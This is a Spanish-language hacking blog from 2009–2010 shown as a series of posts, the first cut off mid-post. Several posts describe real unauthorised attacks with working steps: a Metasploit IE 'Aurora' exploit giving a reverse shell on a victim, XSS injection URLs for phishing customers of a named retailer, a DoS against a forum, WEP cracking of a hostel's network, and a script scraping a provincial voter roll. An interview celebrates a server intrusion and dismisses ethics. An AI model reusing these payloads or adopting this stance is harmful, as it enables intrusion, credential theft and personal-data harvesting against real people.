El servidor lo tengo corriendo en la IP del argumento LHOST en el puerto 8080 y tendremos una reverse shell por el puerto 4444 :).
Ahora mandamos el enlace a la victima, y esperamos que ingrese.

Veamos nuestra consola de metasploit :)

[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client 190.18x.xx.xxx
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (190.18x.xx.xxx:4444 -> 190.18x.xx.xxx:51513)
sessions -l

Active sessions
===============

Id  Description  Tunnel
--  -----------  ------
1   Meterpreter  190.18x.xx.xxx:4444 -> 190.18x.xx.xxx:51513

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: VICTIMA
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: es_ES

Vemos que tenemos la session con la victima, que tiene un Windows XP SP3.
Ahora vamos a la shell remota que es lo mejor :)

meterpreter > shell
Process 812 created.
Channel 1 created.
Microsoft Windows XP [Versi�n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Victima 10\Escritorio>hostname
hostname
victima

C:\Documents and Settings\Victima 10\Escritorio>

Solucion

Navegar con un antivirus para este exploit seria lo mejor el NOD32 lo detecta y no deja inyectar, tambien no usar un IE explorer anticuado asi como el 6.x que fue hecho en esta POC. Mientras pasen cosas parecidas dejar de utilizar el software defectuoso hasta que la Empresa propietaria del mismo largue el parche, para cada programa siempre hay otro que realiza la misma accion, pudiendo elegirlo a ese temporarlmente.

Referencias:
http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html

http://foro.elhacker.net/hacking_avanzado/metasploit_0day_ie_exploit_ieaurora-t281678.0.html

Saludos

Pishing a través de XSS (POC Luis A. Cuadrado)

2010-02-01T09:54:00.000-08:00

Bueno como anda muy de moda todo lo que es XSS, y la cantidad de sites vulnerables a ellos, voy a mostrar uno de sus tantos usos de engaño.
Primero que es Pishing, es la forma de engañar a la víctima haciéndole creer que esta en un site de confianza cuando en realidad esta en uno maligno, con el fin de poder robar los datos (nombre, usuario, contraseña, numero de tarjeta de crédito, etc.).
Hay una diferencia con respecto al pishing común a lo que es el Pishing a través de XSS. Ejemplo: supongamos que somos cliente de un bancoX, y su pagina de ingreso es http://bancoX.com/login.php, el atacante podría incentivar a la víctima mediante alguna forma de la ingeniería social que ingrese a su sitio maligno hecho por el, haciéndole creer que esta en el original, donde el sitio maligno es http://sitiomaligno/bancoX/login.php.
Entonces una de las formas de verificar siempre si estamos ante un pishing es mirar la dirección de nuestro browser y asegurarnos que estamos donde quisieramos entrar.
El Pishing con XSS, es mucho mas eficiente, ya que el atacante aprovecha la confianza que tiene el cliente con ese dominio, y mediante la inyección de HTML podemos engañar a la persona pidiendo sus datos, y el usuario podrá mirar la dirección de su browser, y efectiva mente estará posicionado en el site correcto de su confianza.

Para un mejor entendimiento voy a mostrar con un site real, que es el Sitio de Luis A. Cuadrado. Esta empresa es por lejos la mas prestigioso de ventas de insumos de informática en Corrientes Capital y Resistencia Chaco, pero pareciera que no le importa mucho la seguridad de sus clientes.
Lo que me llamo la atención fue este enlace, http://www.luiscuadrado.com/login.php, y fue cuando me decidí hacer este articulo.

Siendo usuario del mismo podemos comprar productos y donde los mismos pueden ser enviados al domicilio.

VERIFICANDO LA FALLA

Bien la falla radica en una variable, $products_id, que lo que hace es tomar un numero hacer una consulta a su base de datos, y luego trae la información de el producto correspondiente. Ahora si al pasar el numero $products_id=1249, además de toda la info de dicho articulo con id=1249, el valor se imprime en pantalla sin pasar por algún filtro, :).

Primer Ejemplo: http://www.luiscuadrado.com/product_info.php?products_id=1249%20%3 Cscript%3Ealert%28123%29%3C/script%3E

opps!! XSS!!.

Ahora veamos algo mas lindo, y mas detallado lo que hice fue crear un script en php con un formulario pidiendo Email y Clave, y que los datos se guarden en un archivo de texto, la inyección es mediante un iframe.

Segundo Ejemplo: http://www.luiscuadrado.c om/product_info.php?products_id=1249%20%3Ciframe%20src=http://www.google.com%20height=%22300%2 2%20width=%22800%22%3E%3C/iframe%3E

Google en la pagina de cuadrado! je..

Ahora ahí va algo mucho mejor, que vendría hacer lo que estábamos hablando insertar un formulario pidiendo Email y password..

Vean el formulario de logueo, tranquilamente se puede engañar a la gente pidiendo sus claves para luego obtener el ingreso al sistema. (en este momento no esta el link ya voy a subir los php que cree a un server amigo, para que uds lo vean desde su browser). Los datos quedan guardados en un archivo txt.

El escenario esta preparado, lo único que quedaría es usar la imaginacion para engañar a sus clientes. Y quizás tener algunos insumos de informatica mas!! xD

Prevencion:

Todas las variables mostradas por pantalla deberían ser pasadas por filtro, para no tener este tipo de problema, obviamente que todo depende de la calidad del programador, ya que no solo nos enfrentamos con XSS, sino también CRSF o XSRF, donde el que sale perjudicado es el usuario final.
Recomiendo usar agregados como Noscript para el firefox, y siempre estar atento los posibles mail, sms, mensajes por msn, que nos envien a un sitio donde somos usuarios y pidan nuestros datos por alguna razon X, estar seguro que donde estamos es quien dice ser.!

Mas Documentación

http://itfreekzone.blogspot.com/2009/12/cruzando-informacion-cross-site.html

http://itfreekzone.blogspot.com/2009/12/rompiendo-lo-grande-xss-avanzado.html

Saludos!!

Denial of Service elhacker.net

2010-01-19T21:41:00.000-08:00

En seguridad informática, un ataque de denegación de senvicio, también llamado ataque DoS (de las siglas en inglés Denial of Service), es un ataque a un sistema de computadoras o red que causa que un servicio o recurso sea inaccesible a los usuarios legítimos. Normalmente provoca la pérdida de la conectividad de la red por el consumo del ancho de banda de la red de la víctima o sobrecarga de los recursos computacionales del sistema de la víctima. Se genera mediante la saturación de los puertos con flujo de información, haciendo que el servidor se sobrecargue y no pueda seguir prestando servicios, por eso se le dice “denegación”.

Estracto de Daniel,

Bien ahora que hay una idea de lo que es un DOS y como bien dice el titulo es lo que se hizo.
Ayer por la noche Daniel Godoy me mostró un enlace qwe los chicos del staff del elHacker.net dejaron al descubierto donde se podía llegar a modificar la cantidad de consultas a mostrar al usuario. El enlace es este

http://foro.elhacker.net/SSI.php?ssi_function=boardNewsTitulares;board=34;start=1;limit=1

ahora que pasaría si nosotros colocamos en el valor de la variable limit un numero muchisimo mas grande que 1, quedaría algo así.

http://foro.elhacker.net/SSI.php?ssi_function=boardNewsTitulares;board=34;start=1;limit=9999999999999999999999999999999999 99999999999999999999999999999999999999 99999999999999999999999999999999999999 99999999999999999999999999999999999999 99999999999999999999

al ejecutar esa petición en el servidor se nota un delay en el mismo, la cuestión es que pasaría si en vez de enviar una consulta de este tipo por segundo enviamos muchisimas mas, se llegaría a provocar un DOS, para reafirmar nuestra teoría me codee un script en perl que haga eso. En cuestión de segundos pudimos empezar a ver los resultados.

Para los que son aun mas exigentes les damos un videito.

Si bien mas que nada todo esto fue hecho para alimentar nuestro ego y para poder ayudar a su comunidad. En fin nunca se puedo contar con un %100 de seguridad siempre hay un eslabón debil por donde romper.

Creditos: MagnoBalt && FR34K
[magnobalt.blogspot.com][www.delincuentedigital.com.ar]

Saludos

Reverse DNS

2010-01-18T18:41:00.000-08:00

Bueno después de una larga ausencia por motivos de las vacaciones y llegado hace instante, vuelvo a darle vida al blog, quiero saludar dando un Feliz 2010 y que todos sigamos creciendo y con buena salud, y espero que este año siga conociendo gente copada como lo hice en el 2009 que fue buenisimo.

Bueno el motivo de este post es hablar sobre una técnica llamada reverse DNS, que en un Pentest no se debería dejar de lado, ya que siempre la Seguridad se rompe por el eslabón mas débil de la cadena. Muchos sabemos que algunos sitios están alojadas en servidores donde se comparte el mismo con otros clientes, es decir que en un servidor hay alojadas distintas paginas o Virtual Host.
Esta técnica se usa para saber que paginas tiene relación con la pagina que estamos testeando. Es decir si nuestro target es www.ejemplo.com.ar, y esta alojada en un servidor donde se encuentran:

www.ejemplo1.com.ar
www.ejemplo2.com.ar
www.ejemplo3.com.ar
.
.
www.ejemploN.com.ar

Las herramientas que logran hacer el Reverse DNS nos mostrara dichas paginas. Los que traigo son 3 script que realizan la acción el cual están codeadas en PHP, PYTHON y PERL para que usen dependiendo la ocación una u otra ( siempre es bueno tener codeadas en distintos lenguajes).
Los códigos en PHP y PYTHON fueron codeadas por mi amigo Daniel Godoy, al cual lo conocí en Salta y donde le hice una entrevista días después, de paso les doy su Blog que no esta bueno, esta muy bueno se lo recomiendo.
Por que es importante esto? Cuando no podamos vulnerar la pagina que estamos testeando, ya sea por conocimientos o por que no hay forma, podríamos pensar que si vulneramos una alojada en el mismo server, obtenemos la confianza del mismo, los que nos da incapie para poder escalar y llegar a nuestro objetivo. Esto me lo han contado xD jaja...

Bueno ahi les dejo los codigo en paste2.org.

S0urc3 PHP
S0urc3 Python
S0urc3 Perl

Saludos..

Ley 25.326 Proteccion de los Datos Personales

2009-12-09T18:08:00.000-08:00

Bueno ando medio perdido y va a ser mas ahora que viene el verano y me voy para mis pagos a pasar las vacaciones, así que con amigos, familia, fiestas, viaje a Mar del Plata, se va a complicar los post. xD

Bueno decidí hacer este post por quizás hay veces que se desconoce de este tipo de derechos que tenemos. Voy a contar antes una historia chiquitita, que viene al caso y que me lo paso esta semana que anduve por Goya.

Resulta que estaba con un amigo y fuimos a buscarle a un amigo del papa de el, que es de Buenos Aires, y contando y hablando como buen porteño, comento que tenia un problema con un servidor dedicado que tiene el que lo usa para enviar mails.. Y ahí como se metió en mi ámbito de la informática le pregunte, si era de el, me contesto que no, era un servidor francés que alquila, y que brinda un servicio que ofrece a empresas de envió de mails, con distintas tarifas dependiendo la cantidad, esta base de mails con mas de 10.000.000 lo tiene organizado por profesión, entre otras cosas. Entonces yo le dije a vos spameas, y me contesto no precisamente. Entonces que realmente hace este?? ¿Acaso este señor no spamea?, acaso a mi me va a llegar a mi inbox un mail donde yo nunca pedí que me llegue ofreciendo algún producto/servicio de una empresa. Eso es SPAM. Y si encima al recibir dicho mail no hay ningún opción donde el usuario tenga la posibilidad de no recibir nunca mas este tipo de mail por esa empresa, entonces es DELITO.

Bien vamos al punto de este post, hay muchas empresas en la Web que ofrecen servicios de información personal de personas cobrando un monto específico. Esto son los populares BANCOS DE DATOS (Según la ley 25.326 un Archivo, registro, base o banco de datos: Indistintamente, designan al conjunto organizado de datos personales que sean objeto de tratamiento o procesamiento, electrónico o no, cualquiera que fuere la modalidad de su formación, almacenamiento, organización o acceso.). Ahora la cuestión de esto es que estuve viendo algunas personas en Internet que quieren saber por ejemplo que tienen estas empresas en su base de datos sobre el mismo. Entonces lo que hacen es pagar el servicio mismo que se le cobraría a cualquiera, para saber los datos de una persona X, pero en este caso es el de sus datos, sin saber que hay un articulo en la ley 25.326 donde el titular de los datos tiene derecho a acceso al mismo.

Veamos el artículo

ARTICULO 14. - (Derecho de acceso).
1. El titular de los datos, previa acreditación de su identidad, tiene derecho a solicitar y obtener información de sus datos personales incluidos en los bancos de datos públicos, o privados destinados a proveer informes.
2. El responsable o usuario debe proporcionar la información solicitada dentro de los diez días corridos de haber sido intimado fehacientemente.
Vencido el plazo sin que se satisfaga el pedido, o si evacuado el informe, éste se estimara insuficiente, quedará expedita la acción de protección de los datos personales o de hábeas data prevista en esta ley.
3. El derecho de acceso a que se refiere este artículo sólo puede ser ejercido en forma gratuita a intervalos no inferiores a seis meses, salvo que se acredite un interés legítimo al efecto.
4. El ejercicio del derecho al cual se refiere este artículo en el caso de datos de personas fallecidas le corresponderá a sus sucesores universales.

Lo que realmente hice fue hacer un pedido a Globinfo, y pedir mis datos que tenían ellos, al recibir el mail me lo querían cobrar $19, creo que era precisamente. Entonces lo que hice es realizar un mail a atención al cliente pidiendo mis datos amprado por la ley 25.236, me respondieron muy bien, diciéndome que mis datos serán otorgados a mi (el Titular), pero debería seguir unas reglas que seria enviar mi copia de DNI a una determinada dirección por correo, y que dicho pedido será enviado dentro de los 10 días, como dice en el inciso 2 articulo 14. Aquí va el modelo de pedido. (Esto tendría que enviarse por correo pero se podría escanear el DNI y enviar por mail también)

Open Discovery S.A.

Larrea 1354 Piso 14 Of 126

CP  (1425)

Ciudad de Buenos Aires

 

Por  la  presente, les solicito hacerme entrega de los datos personales que obren en su Base de Datos respecto de mi persona.

 

Adjunto  a  la  presente  una  fotocopia  simple  de  mi  D.N.I. / L.E. / L.C. / C.I.,  Nº ...............................................  en prueba de mi identidad.

 

Autorizo que mis datos sean transmitidos a la siguiente dirección de correo electrónico: ………………………

 

Lugar y fecha ……………………………………………..

 

Firma:………………………… Aclaración……………………………………

 

Quedando a su entera disposición, le envío un cordial saludo.

 

Lucila

Bueno dentro de poco les cuento como me fue y que que tan precisos son esos datos, Ah en caso de que la información sea falsa tenemos derecho a que ellos borren dicha información de sus bases, y seguramente que va haber un Abogado carroñero que quiera hacer algun reclamo por daños y perjuicios.

Saludos

Seguridad Informatica Y Hacking - San Pedro Jujuy

2009-11-30T09:00:00.000-08:00

Los días 27 y 28 de noviembre se hizo el seminario de Seguridad Informática y Hacking en San Pedro – Jujuy organizado por la gente de “Mentes Libres”. Y tuve la suerte de ir con la gente de Instel & Seguridad, Pedro Cacivio y Sebastián del Prado.

El día Viernes llegamos a las 10 de la mañana aproximadamente a San Pedro después de haberrnos pasado 50 km de la misma (Ponganse las pilas con los carteles de la ruta, para el intendente ;) ). Al entrar fuimos para la plaza principal donde nos buscaron y fuimos al evento.

Al llegar estaba Luciano Laporta dando “Introducción a la Informática”, nos quedamos un rato escuchándolo y después fuimos hacia al hotel a descansar unos minutos para volver a las 13 hs a realizar el Seminario de Forense. Bueno sinceramente la cantidad de gente no fue la que nosotros esperábamos, o las que acostumbran asistir a esos eventos. Quizás alguna mala publicidad del mismo o vaya a saber que fue.

Bueno después de almorzar, que lo hicimos todos juntos con la gente de” Mentes Libres” en el escenario del evento, donde compartimos charlas de toda índole y la infaltable charla sobre Seguridad Informática o algo relacionada al IT. Levantamos todo y empezamos con el taller.

Como en Salta, abrió el seminario Sebastián dando todo la teoría y manejo sobre plataformas Windows en donde es experto en la materia. Y Siguió Pedro dando una buena introducción a los sistemas *nix en Forense y contando sus experiencias. Luego seguí con ataques a sistemas WEB y sistemas de log de apache, explicación de archivo syslogd.conf. Después de una hora de de mi parte para terminar seguimos juntos con Pedro mostrando zappers, rootkits, herramientas anti rootkits . Llegada las 20 y monedas dimos finalizado el seminario.

Al otro día me toco a mí empezar el día de charlas a las 9 am. Y elegí el tema “BLIND SQL INJECTION SOBRE MySQL”. Bueno siguió el cronograma en lo normal, siguiendo Marcos Mansilla, Daniel Godoy, Sebastián del Prado, Luciano Laporta y el cierre Pedro Cacivio.

En fin espero hacer una recolección de las presentaciones para que puedan verlas, y si alguien tiene algunos videos filmados de la charlas (que vi q algunos filmaban) si me pueden contactar así concordamos para subirlos a youtube y asi subir juntos con las presetaciones, para que la gente que no pudo asistir pueda verlos online conjuntamente. Espero de esa ayuda.

En fin Saludos a todos, estaré subiendo dentro de estos días lo prometido

Saludos

Entrevista: Daniel Godoy

2009-11-21T11:25:00.000-08:00

Bueno vi que esta bueno hacer entrevista, y decidí abrir un sector para ello! El que rompe el hielo es Daniel Godoy, lo conocí en La 4ta Jornada de Software Libre en Salta que fue organizado por Salta L.U.G.
El día viernes caímos con Pedro hacia la facultad de Salta UNSA, ya que el tenia que ir a hablar con un chico que le entro al servidor de Mauro Torres (Creador de Tuquito) para mediar las cosas ya que Pedro es amigo de Mauro. En el momento que caímos saludamos a mucha gente de Salta que me iba presentando Pedro, y después de un rato viene Miguel ( uno de los organizadores del evento), nos presenta un vago, el cual era Daniel. Donde nos saludamos. Tiempo seguido, el y Pedro fueron a hablar sobre el tema Tuquito. Yo me quede viendo una charla de Luis Wayar que estuvo muy buena sobre Linux.
Daniel no tuvo problemas en hacerle esta entrevista inexperta de parte mía, y bueno espero que la disfruten.

¿Que tal te pareció Salta?

Hola primero que nada y gracias por hacerme esta entrevista ^^.
Bueno la verdad que primero me gustaría hablar de la calidad bienvenida que me dieron allí, mucha gente copada, Carlos Debian :P
Mattgaviota, no recuerdo sus nombres pero ellos me esperaron y me trataron de 100 puntos, luego me encontré con viejos amigos
como ser, Gerardo Cabero y Miguel Tolaba (sigo agradecido eternamente), y también conocí mucha gente, entre esos a vos, Gabriel, mauro
esteban, bueno mucha gente piola. Y segundo es una ciudad hermosa. Tengo planes de volver muy pronto porque me quede
con ganas de seguir conociéndola.

¿Que onda la noche Salteña?

La noche Salteña, por lo poco que recuerdo, muy copada, muchas mujeres bonitas, alcohol. y mas especificacmente en la Balcarce... hay pubs y boliches por donde busques, la oportunidad que tuve de salir con los chicos del saltalug entramos a un boliche en patota y eramos como 20, la verdad que muy recomendable Salta si es que deseas conocer una hermosa provincia de este país.

¿Que tenes pensado presentar en San Pedro -Jujuy la próxima semana?

bueno uno de los temas dice: Ventajas de tecnologías libre en seguridad informática, la idea a grandes rasgos es explicar porque al momento de confiar en una aplicación (del tipo que sea) les convendría elegir las que estén basadas en tecnologías libres.
mostra como identificar fallos en aplicaciones de código abierto y de código cerrado, pero todo esto muy general, cosa de no aburrir y no meterme en un tema por demás complicado.
La segunda charla sera la de XSS, una técnica muy subestimada. Le puse ese nombre porque la mayoría de los administradores de sitios no fixean esos bugs que si bien al sitio no le causan daño relevante alguno, pueden ser perjudiciales para el usuario final. (a traves de esta técnicas se puede obtener datos personales entre otras cosas y cometer suplantación de identidades)

¿hace cuanto estas en el Under?

si la memoria no me falla ya casi son 4 para 5 años de que me empezó a interesar todo este tema de los sistemas, la verdad que es apasionante y calculo que a vos te debe pasar lo mismo :P

¿Te consideras ético, o la ética es algo que se ve mas desde afuera que de uno mismo?

Y mira con eso respondiste vos mismo la pregunta...siempre es mas fácil señalar :P,...... Ética? no figura en mi diccionario, mas bien yo me creo alguien impulsivo, osea que no contemplo lo que pueda estar bien o mal, si alguien saldrá perjudicado... la ética es un tema para tratarlo con pinzas creo yo...
hay una linea demasiado fina entre ser ético y no... y todo depende de quien lo mire...en fin...esa es mi opinión :)

¿Que pensas de Mauro Torres?

esto es lo que pienso de mauro y espero que nadie se moleste :P, no considero que sea una mala persona, sino que es demasiado arrogante...o al menos
así me cae a mi ... digamos que cuando alguien tiene poder (o cree tenerlo) hace abuso de ello... también claro esta depende de su entorno y de la contención que pueda llegar a tener para no descarrirlarse...pero en fin yo no soy nadie para juzgar como es, que hace..o que es lo mejor para el...
Sin embargo, pienso que debería ser un poco mas humilde ....

¿Que fue lo que te mostró la arrogancia de parte de el?

Bueno tuve la oportunidad de "conocerlo" en Catamarca, donde vino a colgarse el cartel de hacker y por sobre todo de ético..cosa que no tenia nada xD
y hacia alarde de cosas como por ejemplo: que el descubrió el bug del token de joomla, eso lo tengo grabado xD
también que el fue uno de los que descubrió el algoritmo del cvv2 y hasta donde tengo entendido eso lo descubrió Nicolás Montoza, alias Xonico.
bueno y podría enumerar muchas cosas mas

¿Quien entro al servidor vos o Murder?

bueno, en realidad la intrusión la realize yo primero, pero gracias al aporte de Murder, algo fundamental ...digamos que fue un 40 % de el y un 60% mio ...
aun así sin su participación creo que no me hubiese sido tan fácil....teniendo en cuenta que esta en un servidor dedicado...
Algunas cosas que encontramos ahí fueron una carpeta llamada /hack/ con archivos tales como shell.php. cmd.php etc..
y algo mas particular fue el hecho de encontrar el apache corriendo con suid xD

¿Osea que uds al ejecutar comandos desde la shell encontrada, estaban ejecutando comandos como uid=0?

así es, pero ya estaba configurada así por defecto, que loco no?

¿que pensas de la seguridad del servidor de Tuquito, cuales fueron las falencias mas grosas?

yo creo que la principal deficiencia del servidor, fue la negligencia del administrador, a lo mejor estaba confiado que nunca nadie entraría, y supongo que todavía se debe estar preguntando, como alguien tuvo acceso a un server donde solo estaba esa web.
Por otro lado, estaba enel servidor de allytech, que a mi parecer deja mucho que desear esta empresa..

¿pensaste en la repercusión que tendría?

sinceramente no, lo hice por darme ese gustito... no hay nada como plantarse una meta y concretarla.
alguna vez me plantee defacear el server de tuquito para demostrar que no había que tener mucho conocimiento, pero ya ves.... como se dio todo
sinceramente si hubiese sabido que pasaría esto no lo hubiese hecho..�por que? por el hecho de que mucha gente trabaja en este proyecto y se vio perjudicada...

Cambiando de Tema ¿que estas estudiando y cuanto falta para q te recibas?

Estoy estudiando para analista de sistemas y con suerte me falta un poco mas de 12 meses :D
Luego tengo pensado seguir con el 3 año de Ingeniería electrónica, siempre me gusto todo lo que tenga que ver con circuitos y es una asignatura pendiente

para el hack ¿Linux o Windows?

50 y 50 digamos, me gusta el estudio de los sistemas y estudiar el comportamiento de los mismos...tanto para atacar como cuando son atacados :P

¿que Distro usas?

La distribucion que elegí es Slackware, en este momento la 13.0 , y lo prefiero por su estabilidad, "seguridad" y por la sencilles del sistema. en lo posible trato de ser minimalista :)

¿Kde o Gnome?

KDE a morir, sinceramente nunca me gusto mucho Gnome, no me pude acostumbrar a usarlo, no me atrae. en cambio kde me parece mas atractivo y sencillo

¿Lenguaje preferido?

el lenguaje del cual me enamore es PHP, la verdad que puedo hacer casi todo lo que quiero, aunque también me gusta C++ lenguaje en el cual también programo pero que todavía me falta mucho por conocer y llegar a dominarlo

¿Pensas vivir de la Seguridad Informática?

Sinceramente espero poder vivir de la Seguridad informática, pero aquí es muy difícil abrirse camino, quierooo empezar a perfeccionarme en este campo tambiénnn tratar de concientizar a los administradores... hace poco uno me contesto .." no nos hace falta ese servicio, total nos reponemofácilll cuando nos bajan la web..." eso lo dijo el admin de una municipalidad, je y yo me pregunto... no tiene interes por la integridad de los datos??

¿Cual es tu meta en este momento?

bueno mi meta por este momento, es principalmente terminar de estudiar, para poder trabajar, luego entre mis planes esta continuar con el desarrollo y compartir los pocos conocimientos que puedallegar a adquirir, ya que así conozco gente muy copada, y también muy capaz

Por ultimo ¿que te pareció la entrevista? ya que sos el primero en que estreviste

la verdad que muy entretenida y me vuelvo a agradecerte la oportunidad de poder dejar unas palabras en tu blog, ya que veo que tienes un muy buen nivel entre las cosas que posteas, y haberme elegido me llena de orgullo
Gracias

Salta L.U.G 2009

2009-11-11T19:03:00.001-08:00

Bueno quiero felicitar desde mi humilde blog a toda la gente de Salta L.U.G, por la buena onda y la exelente organizacion en la 4ta Jornada de Sofware Libre, gracias a Pedro Cacivio por llevarme y darme un lugar en sus charlas. La verdad que no me arrepiento de haber ido aunque este ahora apretadisimo con la facultad. Conoci a gente muy copada como Alexis Sarghel de Sarsys, Daniel Godoy, Luciano Laporta Podazza entre otros. Espero seguir asistiendo a estos eventos, asi que nos vemos en Jujuy pronto...=)..

Hacking Wifi - WEP

2009-11-06T21:45:00.001-08:00

En este momento estoy en un hostel en la ciudad de Salta, donde vinimos con Sebastian Del Prado y Pedro Cacivio a realizar un seminario de forense, que lo dictamos el dia jueves 5 de noviembre en la universidad UNSA, muy buena asistencia y el publico conforme con la informacion que les pudimos otorgarle. Algunos tips fueron, Del Prado mostrando a full todo lo que sea forense en entornos Windows y los conceptos claves de como actuar en un esenario de ataque para poder recaudar toda la informacion, sacar fotos, tomar la informacion volatil, pendrive, discos, accesos etc. Pedro y yo mostramos ataques contra servidores Linux. y en el caso de un esenario de una maquina hackeada, cuales son los rastros que pudo haber dejado el hacker, plantacion de honeypot, el demonio syslogd, log de apache etc. Pero en fin este articulo que estoy escribiendo es sobre hacking en wireles.
Primero que nada quiero mostrarle una imagen que capture hoy andando vueltas en camioneta mientras buscabamos Hostel. Observen la cantidad de AP usando encriptacion WEP que hay.

Bueno ahora vamos a ver como podemos romper una encriptacion WEP. Hace 2 : 30 horas tuve un problemita donde la chica que trabaja de noche en el HOSTEL no tenia la clave de la WIFI, y solo sabian las chicas de la mañana, yo no podia creer eso!!!!. Nesesitaba mandar un misero mensaje y no tengo credito asi que, manos a la obra, y a quebrarla.

Primero nesesitamos el paquete de aircrack, entonces ejecutamos como root.
#aptitude install aircrack-ng

Perfecto una vez que lo tengamos instalado podemos comenzar.
Colocamos nuestra placa de red IEEE 802.11 en modo promiscuo, de esta forma
para ver que placa de red tenemos del tipo IEEE 802.11 ejecutamos
#iwconfig

ahora si.. para poner en modo promiscuo
#airmon-ng start wlan0

en mi caso mi palca de red wireless es llamada wlan0, en ese lugar deben colocar la de uds.

Segundo Paso es empezar a escuchar el aire, para ello ejecutamos

#airodump-ng mon0 (mon0 es el nombre que me otorgo el airodum-ng para llamarla a mi placa "(monitor mode enabled on mon0) <== asi dice")

CH 6 ][ Elapsed: 20 s ][ 2009-11-07 04:15

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:22:33:32:9E:70 -84 32 27 0 1 54e WEP WEP hostal la Linda

BSSID STATION PWR Rate Lost Packets Probes

00:22:33:32:9E:70 00:1F:3C:A4:8C:8C 0 1e- 0e 0 28 hostal la Linda

Y que es todo esto? en este caso hay un solo AP que mi maquina pueda estar olfateando dentro de su radio. Donde dice BSSID abajo es la MAC del AP. despues tenemos en ENC que es WEP (tipo de encriptacion), el campo ESSID es el nombre de la red la cual es hostal la linda y en la tercera filea hay mas campos que vendria a mostrar las maquinas conectadas a determinados AP. Es decir en este caso el BSSID=00:22:33:32:9E:70 tiene una maquina conectada a el la cual es la STATION=00:1F:3C:A4:8C:8C.

Hay veces que cuando ejecutamos airodump-ng tenemos muchos AP que podemos ver pero nosotros solo nos queremos fijar en uno especifico al cual romper. Entonces lo que podemos hacer para poder situarnos en el canal que esta trabajando el target AP es de la siguiente manera

#airodump-ng mon0 -c 1 -w capture

Que hicimos? primero le decimos que solo olfatee todo lo que va por el canal 1 con -c 1 (channel), y con -w capture (write) le decimos que nos guarde todo en un archivo llamado capture. El cual despues vamos a nesesitar para que el aircrack-ng pueda romper el pass.

Cuarto paso: Seria acelerar la captura de paquetes, de la forma con reiyeccion de paquetes ARP para que el cliente (STATION) vuelva a enviar su auntentificacion y de este modo poder generar mas trafico. El comando es este

#aireplay-ng -3 -b 00:22:33:32:9E:70 -h 00:19:7D:1E:64:4A -x 700 mon0

Ahora el -3 significa el tipo de ataque (leer sobre arcracking-ng), que es reinyeccion de paquetes ARP para provocar nuevos IVS. En el caso de que todo este saliendo correctamente saldra una pantalla similar a esta. Ahora, tienen que esperar quizas unos minutos para que esto se vea algo asi

En esta pantalla se ve en la shell de atras la salida del comando airodump-ng mon0 -c 1 -w capture, y en la que esta superpuesta es la de aireplay-ng, y en este caso la inyeccion de ARP se esta generando, de manera sastifactoria. :). Si se fijaran en la salida de airodump-ng el campo DATA subira mas rapido de lo que esta anteriormente y eso lo que queriamos lograr xD.
Bien si con aireplay-ng no se pudo haber logrado lo anterior, tendriamos que realizar un DOS a la estacion conectada. Abrimos otra shell y ejecutariamos.

#aireplay-ng -0 -0 -a 00:22:33:32:9E:70 -c 00:19:7D:1E:64:4A mon0

De esta forma vaciariamos la cache del cliente para que se vuelva a indentificar. -a es el AP -c el CLIENTE. Si volveriamos a la shell donde se estaba ejecutando el aireplay-ng, se tendria que empezar a realizar el ataque. (en mi caso yo no hice un DOS o desautenticacion ya que ingreso bien la inyeccion de ARP)

aqui otra imagen de la inyeccion, fijense como el campo DATA fue creciendo

Bien ahora solo nos queda comprarnos una coca y esperar. yo fui a caminar por ahi para conocer un poco mas de SALTA.
Bueno una vez que tengamos un numero elevado en el campo DATA, yo por ejemplo lo hice con 234867 es el tiempo de crackear.
Primero paramos el airdodump-ng con ^C. (Control + C). En la misma shell ejecutamos esto

#aircrack-ng capture-01.cap

Donde capture-01.cap es el archivo que me genero el airodump cuando coloque -w capture. Y en unos segundos tenemos la clave. Aqui la pantalla

Moraleja, antes de realizar todo este ataque tratar de probar al menos unas claves relacionadas con el SSID. xD..

Saludos.

Consultas a Padron Electoral 2009

2009-10-28T21:23:00.000-07:00

Bueno estuve mirando la pagina del padrón de las elecciones pasadas en la provincia de Corrientes http://defsep13.corrientes.gov.ar/, donde se votaba para Gobernador. Y fui probando posibles inyecciones en SQL pero no tenia nada de eso, bien filtradas las variables. Así que pase a otro punto, el XSS donde obtuve éxito, pero lo deje alli y me intereso otra cosa .
Como vi que se podía consultar sin una previa Captcha, me puse a codear un script que automatiza las peticiones, y descargarme el padrón de apoco :).
El script lo codifique en perl Aqui el s0urce, lo que hace es abrir un socket hacia el puerto 80, y enviar cabeceras por el método POST de HTTP, haciéndolo dentro de un for para ir cambiando el numero de documento empezando desde 1 hasta una cota maxima que pongamos. Lo hago así por que la consulta aunque pongas un numero de DNI donde no tenga la cantidad de digitos exigentes, la genera igual. Es decir si yo mando el documento 1 con genero masculino. La consulta traerá el primer documento masculino que termine en 1. Si coloco 2 con genereo masculino, la consulta traerá el primer documento maculino que termine con 2 y así.
Bueno esto genera un archivo en extensión html el cual uds pueden cambiarlo desde el código el nombre(Linea 4), también pueden cambiar para que busque genero femenino, en vez de Masc. coloquen Fem. (Linea 23).

Aqui hay una captura de pantalla.

Obviamente que en este archivo mas abajo siguen mas datos, en esta captura solo se logra ver uno.
Saludos..

Configurando VMware Workstation para Debian

2009-10-22T10:30:00.000-07:00

Bueno este post es para aquellos que quieran iniciarse en el mundo de Linux y por ahí no se animan a instalar alguna distro en su disco por miedo a la instalación o por miedo a que pase algo. Vamos a utilizar la tecnologia de virtualizacion. Yo estoy utilizando la VMware Workstation 5.5.0 pero la ultima es VMware Workstation 6.0.2. Se la pueden descargar de la pagina oficial un trial de 30 días.

Entonces empezemos.. :)

1)Al abrir nos aparecera esta pantalla. Ingresaremos donde dice "New Virtual Machine"

2) Seguira esta pantalla con la bienvenida, daremos clic a Siguiente

3) Aqui debemos seleccionar el configuracion apropiada. Marcamos Custom, para dar una configuracion mas avanzada.

4)En esta pantalla nos preguntara que tipo de formato queremos, yo coloque el formato nuevo, osea la opcion New - Workstation 5.

5)Ahora en mi caso estoy por intalar un Debian 5.0 con arquitectura i386. Dejo marcado el tipo de SO Linux y la version Other Linux 2.6.x kernel. Ya que este kernel es de esa familia.

